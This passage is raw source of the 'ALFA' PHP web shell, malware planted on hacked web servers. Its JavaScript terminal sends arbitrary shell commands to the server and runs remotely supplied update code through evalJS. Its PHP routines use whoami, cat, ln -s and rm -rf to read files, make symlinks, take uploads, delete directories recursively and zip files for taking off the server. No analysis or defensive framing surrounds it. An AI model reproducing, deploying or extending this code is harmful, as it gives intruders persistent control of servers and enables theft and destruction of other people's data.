a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
</script>
</body>
</html>
<?php
}}
if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
function posix_getgrgid($p) {return false;} }
function alfaWhich($p) {
$path = alfaEx('which ' . $p,false,false);
if(!empty($path))
return strlen($path);
return false;
}
function alfaSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function alfaPerms($p) {
if (($p & 0xC000) == 0xC000)$i = 's​';
elseif (($p & 0xA000) == 0xA000)$i = 'l​';
elseif (($p & 0x8000) == 0x8000)$i = '-​';
elseif (($p & 0x6000) == 0x6000)$i = 'b​';
elseif (($p & 0x4000) == 0x4000)$i = 'd​';
elseif (($p & 0x2000) == 0x2000)$i = 'c​';
elseif (($p & 0x1000) == 0x1000)$i = 'p​';
else $i = 'u​';
$i .= (($p & 0x0100) ? 'r​' : '-');
$i .= (($p & 0x0080) ? 'w​' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's​' : 'x​' ) : (($p & 0x0800) ? 'S​' : '-'));
$i .= (($p & 0x0020) ? 'r​' : '-');
$i .= (($p & 0x0010) ? 'w​' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's​' : 'x​' ) : (($p & 0x0400) ? 'S​' : '-'));
$i .= (($p & 0x0004) ? 'r​' : '-');
$i .= (($p & 0x0002) ? 'w​' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't​' : 'x​' ) : (($p & 0x0200) ? 'T​' : '-'));
return $i;
}
function alfaPermsColor($f,$isbash=false){
$class = "";
$num = "";
$human = "";
if($isbash){
$class = $f["class"];
$num = $f["num"];
$human = $f["human"];
}else{
$num = substr(sprintf('%o', @fileperms($f)),-4);
$human = alfaPerms(@fileperms($f));
if(!@is_readable($f))
$class = "main_red_perm";
elseif (!@is_writable($f))
$class = "main_white_perm";
else
$class = "main_green_perm";
}
return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
function reArrayFiles($file_post){
$file_ary = array();
$file_count = count($file_post['name']);
$file_keys = array_keys($file_post);
for ($i=0; $i<$file_count; $i++) {
foreach ($file_keys as $key) {
$file_ary[$i][$key] = $file_post[$key][$i];
}
}
return $file_ary;
}
function _alfa_can_runCommand($cgi=true,$cache=true){
if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
return true;
}
if(strlen(alfaEx("whoami",false,$cgi))>0){
$_COOKIE["alfa_canruncmd"] = true;
return true;
}
return false;
}
function _alfa_symlink($target, $link){
$phpsym = function_exists("symlink");
if($phpsym){
@symlink($target, $link);
}else{
alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
}
}
function _alfa_file_exists($file,$cgi=true){
if(@file_exists($file)){
return true;
}else{
if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
return true;
}
}
return false;
}
function _alfa_file($file,$cgi=true){
$array = @file($file);
if(!$array){
if(strlen(alfaEx("id",false,$cgi))>0){
$data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
if(strlen($data)>0){
return explode("\n", $data);
}else{
return false;
}
}else{
return false;
}
}else{
return $array;
}
}
function _alfa_is_writable($file){
$check = false;
$check = @is_writable($file);
if(!$check){
if(_alfa_can_runCommand()){
$check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
if($check == "yes"){
$check = true;
}else{
$check = false;
}
}
}
return $check;
}function _alfa_is_dir($dir,$mode="-d"){
$check = false;
$check = @is_dir($dir);
if($mode == "-e"){
$check = @is_file($dir);
}
if(!$check){
if(_alfa_can_runCommand()){
$check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
if($check == "yes"){
return true;
}else{
return false;
}
}
}
return $check;
}
function _alfa_load_ace_options($base){
return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
}
function alfaFilesMan2(){
alfahead();
AlfaNum(8,9,10,7,6,5,4);
echo '<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>';
alfaFooter();
}
function copy_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
function alfaFilesMan(){
if(!empty ($_COOKIE['alfa_f']))
$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
if(!empty($_POST['alfa1'])){
switch($_POST['alfa1']){
case 'uploadFile':
$move_cmd_file = false;
$alfa_canruncmd = false;
if($GLOBALS['glob_chdir_false']){
$alfa_canruncmd = _alfa_can_runCommand(true,true);
$move_cmd_file = true;
}
if(_alfa_is_writable($GLOBALS['cwd'])){
$files = reArrayFiles($_FILES['f']);
$ret_files = array();
foreach($files as $file){
if($move_cmd_file&&$alfa_canruncmd){
alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
}else{
if(@move_uploaded_file($file['tmp_name'],$file['name'])){
$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
$file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
$file_perm = alfaPermsColor($file['name']);
$file_size = @filesize($file['name']);
$ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
}
}
}
if(!$move_cmd_file){
echo json_encode($ret_files);
}
}else{
echo "noperm";
return;
}
if(!$move_cmd_file){
return;
}
break;
case 'mkdir':
$new_dir_cmd = false;
if($GLOBALS['glob_chdir_false']){
if(_alfa_can_runCommand(true,true)){
if(_alfa_is_writable($GLOBALS['cwd'])){
if(!_alfa_is_dir(trim($_POST['alfa2']))){
alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
}else{
echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
}
}else{
echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
}
}else{
echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
}
}else{
if(_alfa_is_writable($GLOBALS['cwd'])){
if(!_alfa_is_dir(trim($_POST['alfa2']))){
if(!@mkdir(trim($_POST['alfa2']))){
echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
}else{
echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
}
}else{
echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
}
}else{
echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
}
}
break;
case 'delete':
function deleteDir($path){
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = @opendir($path);
while(($item = @readdir($dh)) !== false){
$item = $path.$item;
if((basename($item) == "..") || (basename($item) == "."))
continue;
$type = @filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
@closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f == '..')
continue;
$f = rawurldecode($f);
if($GLOBALS["glob_chdir_false"]){
if(_alfa_can_runCommand(true,true)){
alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
}
}else{
alfaEx("rm -rf '".addslashes($f)."'",false,false);
if(@is_dir($f))
deleteDir($f);
else
@unlink($f);
}
}
if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
deleteDir(rawurldecode(@$_POST['alfa2']));
alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
}else{
@unlink(rawurldecode(@$_POST['alfa2']));
}
if($GLOBALS["glob_chdir_false"]){
$source = rawurldecode(@$_POST['alfa2']);
if($source!='..'&&!empty($source)){
if(_alfa_can_runCommand(true,true)){
alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
}
}
}
if(is_array($_POST['f']))
return;
break;
case 'paste':
if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
foreach($_COOKIE['alfa_f'] as $f)
copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
function move_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if(($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
}elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['alfa_f'] as $f)
@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$zipX = "alfa_".rand(1,1000).".zip";
if($zip->open($zipX, 1)){
@chdir($_COOKIE['alfa_c']);
foreach($_COOKIE['alfa_f'] as $f){
if($f == '..')continue;
if(@is_file($_COOKIE['alfa_c'].$f))
$zip->addFile($_COOKIE['alfa_c'].$f, $f);
elseif(@is_dir($_COOKIE['alfa_c'].$f)){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
foreach($iterator as $key=>$value){
$key = str_replace('\\','/',realpath($key));
if(@is_dir($key)){
if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
}else{$zip->addFile($key,$key);}}}}
